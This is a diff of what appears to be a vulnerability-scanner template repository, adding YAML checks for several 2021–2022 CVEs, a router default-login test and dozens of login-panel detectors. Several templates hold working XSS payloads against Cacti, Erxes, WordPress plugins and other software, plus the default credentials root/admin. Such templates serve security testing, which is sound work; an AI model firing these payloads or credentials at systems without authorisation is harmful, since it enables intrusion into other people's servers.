description: In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled. To check whether this is enabled go to COG > User Management > User Signup Options. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.
tags: cve,cve2021,rce,confluence,injection,ognl
reference:
- https://jira.atlassian.com/browse/CONFSERVER-67940

35
cves/2021/CVE-2021-26247.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2021-26247
info:
name: Unauthenticated XSS Cacti - auth_changepassword.php
author: dhiyaneshDK
severity: medium
description: As an unauthenticated remote user, visit "http://<CACTI_SERVER>/auth_changepassword.php?ref=<script>alert(1)</script>" to successfully execute the JavaScript payload present in the "ref" URL parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2021-26247
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-26247
cwe-id: CWE-79
tags: cve,cve2021,cacti,xss
requests:
- method: GET
path:
- '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"></script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

13
cves/2021/CVE-2021-29156.yaml
View File

@ -1,12 +1,17 @@
id: CVE-2021-29156
info:
name: LDAP Injection In Openam
name: LDAP Injection In OpenAM
author: melbadry9,xelkomy
severity: high
tags: cve,cve2021,openam,ldap,injection
description: The vulnerability was found in the password reset feature that OpenAM provides. When a user tries to reset his password, he is asked to enter his username then the backend validates whether the user exists or not through an LDAP query before the password reset token is sent to the user’s email.
reference: https://blog.cybercastle.io/ldap-injection-in-openam/
description: OpenAM contains an LDAP injection vulnerability. When a user tries to reset his password, they are asked to enter username, and then the backend validates whether the user exists or not through an LDAP query. If the user exists, the password reset token is sent to the user's email. Enumeration can allow for full password retrieval.
remediation: Upgrade to OpenAM commercial version 13.5.1 or later.
reference:
https://github.com/sullo/advisory-archives/blob/master/Forgerock_OpenAM_LDAP_injection.md
https://hackerone.com/reports/1278050
https://www.guidepointsecurity.com/blog/ldap-injection-in-forgerock-openam-exploiting-cve-2021-29156/
https://portswigger.net/research/hidden-oauth-attack-vectors
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
@ -24,3 +29,5 @@ requests:
- type: dsl
dsl:
- 'contains(body, "jato.pageSession") && status_code==200'
# Enhanced by cs on 2022/01/24

47
cves/2021/CVE-2021-32682.yaml Normal file
View File

@ -0,0 +1,47 @@
id: CVE-2021-32682
info:
name: elFinder - Multiple vulnerabilities leading to RCE
author: smaranchand
severity: critical
tags: cve,cve2021,elfinder,misconfig,rce,oss
description: elFinder is an open-source file manager for web, written in JavaScript using jQuery UI. Several vulnerabilities affect elFinder 2.1.58. These vulnerabilities can allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration. The issues were patched in version 2.1.59. As a workaround, ensure the connector is not exposed without authentication.
reference:
- https://smaranchand.com.np/2022/01/organization-vendor-application-security/
- https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities
- https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr
- https://nvd.nist.gov/vuln/detail/CVE-2021-32682
remediation: Update to elFinder 2.1.59
metadata:
github: https://github.com/Studio-42/elFinder
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-32682
cwe-id: CWE-22,CWE-78,CWE-918
requests:
- method: GET
path:
- "{{BaseURL}}/admin/elfinder/elfinder-cke.html"
- "{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html"
- "{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html"
- "{{BaseURL}}/assets/elFinder/elfinder.html"
- "{{BaseURL}}/backend/elfinder/elfinder-cke.html"
- "{{BaseURL}}/elfinder/elfinder-cke.html"
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html"
- "{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html"
- "{{BaseURL}}/uploads/elfinder/elfinder-cke.html"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
words:
- "elfinder"
- "php/connector"
condition: and
- type: status
status:
- 200

36
cves/2021/CVE-2021-32853.yaml Normal file
View File

@ -0,0 +1,36 @@
id: CVE-2021-32853
info:
name: Erxes <= v0.23.0 XSS
author: dwisiswant0
severity: medium
description: Erxes prior to version 0.23.0 is vulnerable to cross-site scripting.The value of topicID parameter is not escaped & triggered in the enclosing script tag.
reference:
- https://securitylab.github.com/advisories/GHSL-2021-103-erxes/
- https://nvd.nist.gov/vuln/detail/CVE-2021-3285
metadata:
shodan-query: http.title:"erxes"
tags: cve,cve2021,xss,erxes,oss
requests:
- method: GET
path:
- "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'topic_id: "</script><script>alert(document.domain)</script>'
- "window.erxesEnv"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

2
cves/2021/CVE-2021-38314.yaml
View File

@ -13,7 +13,7 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2021-38314
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of sites `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site's `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`."
requests:
- raw:

48
cves/2021/CVE-2021-39350.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2021-39350
info:
name: FV Flowplayer Video Player WordPress plugin - Authenticated Reflected XSS
author: gy741
severity: medium
description: The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts, in versions 7.5.0.727 - 7.5.2.727.
reference:
- https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
- https://nvd.nist.gov/vuln/detail/CVE-2021-39350
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-39350
cwe-id: CWE-79
tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Cookie: wordpress_test_cookie=WP%20Cookie%20check
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

2
cves/2021/CVE-2021-40960.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-40960
info:
name: Galera WebTemplate 1.0 Directory Traversal
name: Galera WebTemplate 1.0 Directory Traversal
author: daffainfo
severity: critical
description: Galera WebTemplate 1.0 is affected by a directory traversal vulnerability that could reveal information from /etc/passwd and /etc/shadow.

38
cves/2021/CVE-2021-45380.yaml Normal file
View File

@ -0,0 +1,38 @@
id: CVE-2021-45380
info:
name: AppCMS - Reflected Cross-Site Scripting (XSS)
author: pikpikcu
severity: medium
description: AppCMS 2.0.101 has a XSS injection vulnerability in \templates\m\inc_head.php
reference:
- https://github.com/source-trace/appcms/issues/8
- https://nvd.nist.gov/vuln/detail/CVE-2021-45380
tags: cve,cve2021,appcms,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-45380
cwe-id: CWE-79
requests:
- method: GET
path:
- '{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '""></script><script>alert(document.domain)</script>'
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

111
cves/2021/CVE-2021-46005.yaml Normal file
View File

@ -0,0 +1,111 @@
id: CVE-2021-46005
info:
name: Sourcecodester Car Rental Management System 1.0 - Stored XSS
author: cckuailong
severity: medium
description: Sourcecodester Car Rental Management System 1.0 is vulnerable to Cross Site Scripting (XSS) via vehicalorcview parameter.
reference:
- https://www.exploit-db.com/exploits/49546
- https://nvd.nist.gov/vuln/detail/CVE-2021-46005
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2021-46005
cwe-id: CWE-79
tags: cve,cve2021,xss,sourcecodester,authenticated
requests:
- raw:
- |
POST /admin/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Connection: close
username={{username}}&password={{password}}&login=
- |
POST /admin/post-avehical.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypWqYipqU21aYgccv
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="vehicletitle"
Test
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="brandname"
1
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="vehicalorcview"
</script><script>alert(document.domain)</script>
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="priceperday"
500
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="fueltype"
Petrol
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="modelyear"
2022
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="seatingcapacity"
5
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img1"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img2"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img3"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img4"; filename="test.png"
Content-Type: image/png
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="img5"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundarypWqYipqU21aYgccv
Content-Disposition: form-data; name="submit"
------WebKitFormBoundarypWqYipqU21aYgccv--
- |
GET / HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

2
cves/2022/CVE-2022-0218.yaml
View File

@ -4,7 +4,7 @@ info:
name: HTML Email Template Designer < 3.1 - Stored Cross-Site Scripting (XSS)
author: hexcat
severity: high
description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
description: WordPress Email Template Designer WP HTML Mail allows stored XSS through an unprotected REST-API endpoint (CVE-2022-0218).
reference:
- https://www.wordfence.com/blog/2022/01/unauthenticated-xss-vulnerability-patched-in-html-email-template-designer-plugin/
- https://wordpress.org/plugins/wp-html-mail/

33
cves/2022/CVE-2022-23944.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2022-23944
info:
name: ShenYu Admin Unauth Access
author: cckuakilong
severity: medium
description: User can access /plugin api without authentication. This issue affected Apache ShenYu 2.4.0 and 2.4.1.
reference:
- https://github.com/apache/incubator-shenyu/pull/2462/files
- https://nvd.nist.gov/vuln/detail/CVE-2022-23944
- https://github.com/cckuailong/reapoc/blob/main/2022/CVE-2022-23944/vultarget/README.md
classification:
cve-id: CVE-2022-23944
cwe-id: CWE-862
tags: cve,cve2022,shenyu,unauth,apache
requests:
- method: GET
path:
- "{{BaseURL}}/plugin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"message":"query success"'
- '"code":200'
condition: and
- type: status
status:
- 200

33
default-logins/mofi/mofi4500-default-login.yaml Normal file
View File

@ -0,0 +1,33 @@
id: mofi4500-default-login
info:
name: MOFI4500-4GXeLTE-V2 Default Login
author: pikpikcu
severity: critical
tags: mofi,default-login
requests:
- raw:
- |
POST /cgi-bin/luci/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=root&password=admin
attack: pitchfork
payloads:
username:
- root
password:
- admin
matchers-condition: and
matchers:
- type: word
words:
- "MOFI4500 - General - LuCI"
- type: status
status:
- 200

28
exposed-panels/bigbluebutton-login.yaml Normal file
View File

@ -0,0 +1,28 @@
id: bigbluebutton-login
info:
name: BigBlueButton Login Panel
author: myztique
severity: info
reference: https://github.com/bigbluebutton/greenlight
tags: panel,bigbluebutton
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'content="BigBlueButton'
extractors:
- type: regex
part: body
name: version
group: 1
regex:
- 'Greenlight<\/a>\. (.*)'

24
exposed-panels/flightpath-panel.yaml Normal file
View File

@ -0,0 +1,24 @@
id: flightpath-panel
info:
name: FlightPath Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.title:"flightpath"
tags: panel,flightpath
requests:
- method: GET
path:
- "{{BaseURL}}/login"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Login | FlightPath</title>"
- type: status
status:
- 200

25
exposed-panels/jamf-panel.yaml Normal file
View File

@ -0,0 +1,25 @@
id: jamf-panel
info:
name: JAMF MDM Panel
author: pdteam
severity: info
metadata:
shodan-query: http.favicon.hash:1262005940
tags: jamf,panel,mdm
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: all
words:
- "Jamf Pro Login"
- "Jamf Cloud Node"
condition: or

4
exposed-panels/joomla-panel.yaml
View File

@ -1,7 +1,7 @@
id: joomla-panel
info:
name: Joomla Panel
name: Joomla! Panel
author: its0x08
severity: info
tags: panel,joomla
@ -16,3 +16,5 @@ requests:
- '<meta name="generator" content="Joomla! - Open Source Content Management" />'
- '/administrator/templates/isis/images/joomla.png'
condition: or
# Enhanced by cs on 2022/01/28

24
exposed-panels/netdata-dashboard-detected.yaml Normal file
View File

@ -0,0 +1,24 @@
id: netdata-dashboard-detect
info:
name: NetData Dashboard Detect
author: pussycat0x
severity: info
metadata:
shodan-dork: 'Server: NetData Embedded HTTP Server'
tags: netdata,panel,tech
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>netdata dashboard</title>'
- type: status
status:
- 200

9
technologies/openam-detect.yaml → exposed-panels/openam-panel.yaml
View File

@ -1,10 +1,12 @@
id: openam-detect
id: openam-panel
info:
name: Detect OpenAM and OpenSSO
name: OpenAM and OpenSSO Login Panel
author: philippedelteil
severity: info
tags: tech,openam
metadata:
shodan-query: http.title:"OpenAM"
tags: panel,openam,opensso,login
requests:
- method: GET
@ -16,6 +18,7 @@ requests:
- "{{BaseURL}}/sso/XUI"
- "{{BaseURL}}/sso/UI"
- "{{BaseURL}}/sso/UI/#login"
- "{{BaseURL}}/opensso/UI/Login"
- "{{BaseURL}}/openam/UI/login"
- "{{BaseURL}}/openam/UI/#loginlogin"
- "{{BaseURL}}/openam/UI/Login"

28
exposed-panels/openbmcs-detect.yaml Normal file
View File

@ -0,0 +1,28 @@
id: openbmcs-detect
info:
name: openbmcs-detect
author: ffffffff0x
severity: info
tags: openbmcs,detect
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'BMS - Login'
- 'Copyright all rights reserved by Open BMCS'
- 'OpenBMCS does not support Internet Explorer'
condition: or
- type: status
status:
- 200

7
technologies/opensis-detect.yaml → exposed-panels/opensis-panel.yaml
View File

@ -1,10 +1,12 @@
id: opensis-detect
info:
name: OpenSIS Detect
name: OpenSIS Login Panel
author: pikpikcu
severity: info
tags: tech,opensis
metadata:
shodan-query: http.title:"openSIS"
tags: panel,opensis,login
requests:
- method: GET
@ -12,6 +14,7 @@ requests:
- "{{BaseURL}}"
- "{{BaseURL}}/opensis/index.php"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word

8
technologies/openx-detect.yaml → exposed-panels/openx-panel.yaml
View File

@ -1,10 +1,12 @@
id: openx-detect
id: openx-panel
info:
name: OpenX detect
name: OpenX Login Panel
author: pikpikcu
severity: info
tags: tech,openx
metadata:
shodan-query: http.title:"OpenX"
tags: panel,openx,login
requests:
- method: GET

13
technologies/phpcollab-detect.yaml → exposed-panels/phpcollab-panel.yaml
View File

@ -1,22 +1,29 @@
id: phpcollab-detect
id: phpcollab-panel
info:
name: PhpCollab detect
name: PhpCollab Login Panel
author: pikpikcu
severity: info
tags: tech,phpcollab
metadata:
shodan-query: http.title:"PhpCollab"
tags: panel,phpcollab,login
requests:
- method: GET
path:
- "{{BaseURL}}/general/login.php"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>PhpCollab</title>'
- type: status
status:
- 200
extractors:
- type: regex
part: body

10
technologies/remkon-manager-detect.yaml → exposed-panels/remkon-manager-panel.yaml
View File

@ -1,10 +1,12 @@
id: remkon-manager-detect
id: remkon-manager-panel
info:
name: Remkon Device Manager Detect
author: pikpikcu
name: Remkon Device Manager Login Panel
author: pikpikcu,daffainfo
severity: info
tags: remkon,tech,panel
metadata:
shodan-query: http.title:"Remkon Device Manager"
tags: panel,remkon,login
requests:
- method: GET

13
technologies/sage-detect.yaml → exposed-panels/sage-panel.yaml
View File

@ -1,10 +1,12 @@
id: sage-detect
id: sage-panel
info:
name: Sage X3 Detect
author: pikpikcu
name: Sage X3 Login Panel
author: pikpikcu,daffainfo
severity: info
tags: tech,sage
metadata:
shodan-query: http.title:"Sage X3"
tags: panel,sage,login
requests:
- method: GET
@ -13,11 +15,12 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Sage X3</title>"
- "'/auth/sage-id/registerStart'"
condition: and
- type: status
status:

31
exposed-panels/seeddms-panel.yaml Normal file
View File

@ -0,0 +1,31 @@
id: seeddms-panel
info:
name: SeedDMS Login Panel
author: pussycat0x,daffainfo
severity: info
metadata:
shodan-query: http.title:"SeedDMS"
tags: panel,seeddms,login
requests:
- method: GET
path:
- "{{BaseURL}}/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
- "{{BaseURL}}/dms/out/out.Login.php?referuri=%2Fout%2Fout.ViewFolder.php"
redirects: true
max-redirects: 2
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'href="/out/out.ViewFolder.php">SeedDMS</a>'
- 'href="../out/out.ViewFolder.php?folderid=1">SeedDMS</a>'
condition: or
- type: status
status:
- 200

3
exposed-panels/strapi-documentation.yaml
View File

@ -1,9 +1,10 @@
id: strapi-documentation
info:
name: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
name: Strapi Documentation
author: idealphase
severity: info
description: Strapi CMS - documentation plugin from marketplace (Make the documentation endpoint private. By default, the access is public)
tags: strapi,panel
requests:

33
exposed-panels/threatq-login.yaml Normal file
View File

@ -0,0 +1,33 @@
id: threatq-login
info:
name: ThreatQ login panel
author: idealphase
severity: info
description: ThreatQ serves as an open and extensible threat intelligence platform that allows you to automate the intelligence lifecycle, quickly understand threats, make better decisions and accelerate detection and response
reference: https://www.threatq.com/threat-intelligence-platform/
tags: panel,threatq
requests:
- method: GET
path:
- '{{BaseURL}}/login'
matchers-condition: and
matchers:
- type: word
words:
- '<title ng-bind="PageTitle.getTitle()">ThreatQ</title>'
- '<script src="/assets/js/threatq.min.js'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<script src="/assets/js/threatq.min.js\?(.*)'

26
exposed-panels/typo3-login.yaml Normal file
View File

@ -0,0 +1,26 @@
id: typo3-login
info:
name: TYPO3 Login Detect
author: dadevel
severity: info
tags: panel,typo3
requests:
- method: GET
path:
- "{{BaseURL}}/typo3/"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "TYPO3 CMS"
- "typo3-login-form"
- "TYPO3 SVN ID:"
condition: or
- type: status
status:
- 200

26
exposed-panels/voipmonitor-panel.yaml Normal file
View File

@ -0,0 +1,26 @@
id: voipmonitor-panel
info:
name: VoipMonitor panel
author: Yanyun
severity: info
metadata:
shodan-query: http.title:"VoIPmonitor"
tags: panel,voipmonitor,login
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "appShareUrl = 'share.voipmonitor.org'"
- "VoIPmonitor"
condition: and

33
exposed-panels/wallix-accessmanager-panel.yaml Normal file
View File

@ -0,0 +1,33 @@
id: wallix-accessmanager-panel
info:
name: Wallix Access Manager Panel
author: righettod
severity: info
reference: https://www.wallix.com/privileged-access-management/access-manager/
metadata:
shodan-query: http.title:"Wallix Access Manager"
tags: panel,wallix
requests:
- method: GET
path:
- '{{BaseURL}}/wabam'
- '{{BaseURL}}/wabam/favicon.ico'
stop-at-first-match: true
redirects: true
max-redirects: 3
matchers-condition: or
matchers:
- type: dsl
dsl:
- "status_code==200"
- "contains(tolower(body), '<title>wallix access manager</title>')"
condition: and
- type: dsl
dsl:
- "status_code==200"
- "('1745235488' == mmh3(base64_py(body)))"
condition: and

37
exposed-panels/wazuh-panel.yaml Normal file
View File

@ -0,0 +1,37 @@
id: wazuh-panel
info:
name: Wazuh Login Panel
author: cyllective,daffainfo
severity: info
description: Wazuh - The Open Source Security Platform
reference: https://github.com/wazuh/wazuh
metadata:
shodan-query: http.title:"Wazuh"
tags: panel,wazuh,login
requests:
- method: GET
path:
- "{{BaseURL}}/app/login"
matchers:
- type: word
part: body
words:
- '&quot;id&quot;:&quot;wazuh&quot;'
- '&quot;title&quot;:&quot;Wazuh&quot;'
- '&quot;icon&quot;:&quot;plugins/wazuh/img/icon_blue.png&quot;'
- '&quot;url&quot;:&quot;/app/wazuh&quot;'
condition: or
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '&quot;version&quot;:&quot;([0-9.]+)&quot;'

32
exposed-panels/webmodule-ee-panel.yaml Normal file
View File

@ -0,0 +1,32 @@
id: webmodule-ee-panel
info:
name: Webmodule Login Panel
author: pussycat0x,daffainfo
severity: info
metadata:
google-dork: intitle:"Webmodule" inurl:"/webmodule-ee/login.seam" "Version"
reference: https://www.exploit-db.com/ghdb/7001
tags: panel,webmodule-ee,login
requests:
- method: GET
path:
- "{{BaseURL}}/webmodule-ee/login.seam"
matchers-condition: and
matchers:
- type: word
words:
- "<title>Webmodule</title>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- 'Version: ([0-9.]+)'

30
exposed-panels/xxljob-panel.yaml Normal file
View File

@ -0,0 +1,30 @@
id: xxljob-panel
info:
name: XXLJOB Admin Login Panel
author: pdteam,daffainfo
severity: info
tags: panel,xxljob,login
requests:
- method: GET
path:
- "{{BaseURL}}/xxl-job-admin/toLogin"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<a><b>XXL</b>JOB</a>"
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '"admin_version":"(.*?)"'

20
technologies/yzmcms-detect.yaml → exposed-panels/yzmcms-panel.yaml
View File

@ -1,10 +1,12 @@
id: yzmcms-detect
id: yzmcms-panel
info:
name: YzmCMS Detect
author: pikpikcu
name: YzmCMS Login Panel
author: pikpikcu,daffainfo
severity: info
tags: yzmcms,tech
metadata:
shodan-query: http.title:"YzmCMS"
tags: panel,yzmcms,login
requests:
- method: GET
@ -13,11 +15,13 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- 'Powered By <a href="http://www.yzmcms.com"'
- 'Powered By YzmCMS'
condition: or
- type: status
status:
- 200

32
exposed-panels/zblogphp-panel.yaml Normal file
View File

@ -0,0 +1,32 @@
id: zblogphp-panel
info:
name: Z-BlogPHP Panel
author: princechaddha
severity: info
metadata:
shodan-query: http.html:"Z-BlogPHP"
tags: panel,zblogphp
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<meta name="generator" content="Z-BlogPHP'
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '<meta name="generator" content="([:A-Z-a-z 0-9.]+)"'

7
exposed-panels/zoho/manageengine-servicedesk.yaml
View File

@ -2,9 +2,11 @@ id: manageengine-servicedesk
info:
name: ZOHO ManageEngine ServiceDesk
author: dhiyaneshDK
author: dhiyaneshDK,righettod
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
reference:
- https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
- https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus+-+MSP%22
tags: panel,zoho,manageengine
requests:
@ -17,6 +19,7 @@ requests:
- type: word
words:
- '<title>ManageEngine ServiceDesk Plus</title>'
- '<title>ManageEngine ServiceDesk Plus - MSP</title>'
- type: status
status:

4
exposures/configs/honeywell-scada-config.yaml
View File

@ -1,7 +1,7 @@
id: honeywell-scada-config
info:
name: Honeywell Scada System Information Disclosure
name: Honeywell Scada System Information Disclosure
author: alperenkesk
severity: low
reference: https://www.exploit-db.com/exploits/44734
@ -22,4 +22,4 @@ requests:
- type: status
status:
- 200
- 200

1380
exposures/tokens/generic/credentials-disclosure.yaml
View File

File diff suppressed because it is too large Load Diff

1383
file/keys/credential-exposure.yaml
View File

File diff suppressed because it is too large Load Diff

2
file/php/php-scanner.yaml
View File

@ -27,7 +27,7 @@ file:
- type: regex
# Investigate for possible SQL Injection
# Likely vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = $user_id");
# Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array($user_id));
# Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array('$user_id'));
regex:
- '(?i)getone|getrow|getall|getcol|getassoc|execute|replace'
- type: regex

4
miscellaneous/addeventlistener-detect.yaml
View File

@ -4,7 +4,7 @@ info:
name: AddEventlistener detection
author: yavolo
severity: info
tags: xss
tags: xss,misc
reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source
requests:
@ -14,6 +14,6 @@ requests:
matchers:
- type: word
part: body
words:
- 'window.addEventListener('
part: body

6
miscellaneous/apple-app-site-association.yaml
View File

@ -4,7 +4,7 @@ info:
name: Apple app site association for harvesting end points
author: panch0r3d
severity: info
tags: misc
tags: misc,apple
requests:
- method: GET
@ -17,17 +17,17 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'applinks'
- 'appID'
- 'paths'
part: body
condition: and
- type: word
part: header
words:
- 'application/json'
part: header
- type: status
status:

2
miscellaneous/dir-listing.yaml
View File

@ -11,6 +11,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
@ -18,3 +19,4 @@ requests:
- "Index of /"
- "[To Parent Directory]"
- "Directory: /"
condition: or

20
miscellaneous/display-via-header.yaml
View File

@ -1,20 +0,0 @@
id: display-via-header
info:
name: Display Via Header
author: geeknik
reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via
severity: info
tags: misc,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
extractors:
- type: regex
part: header
regex:
- "Via:.*"

4
miscellaneous/joomla-htaccess.yaml
View File

@ -16,14 +16,14 @@ requests:
matchers:
- type: word
words:
- "# @package Joomla"
- "Joomla"
- "Open Source Matters. All rights reserved"
condition: and
- type: word
part: header
words:
- "text/plain"
part: header
- type: status
status:

2
miscellaneous/joomla-manifest-file.yaml
View File

@ -21,9 +21,9 @@ requests:
condition: and
- type: word
part: header
words:
- "application/xml"
part: header
- type: status
status:

2
miscellaneous/moodle-changelog.yaml
View File

@ -22,9 +22,9 @@ requests:
condition: and
- type: word
part: header
words:
- "text/plain"
part: header
- type: status
status:

2
miscellaneous/ntlm-directories.yaml
View File

@ -14,7 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
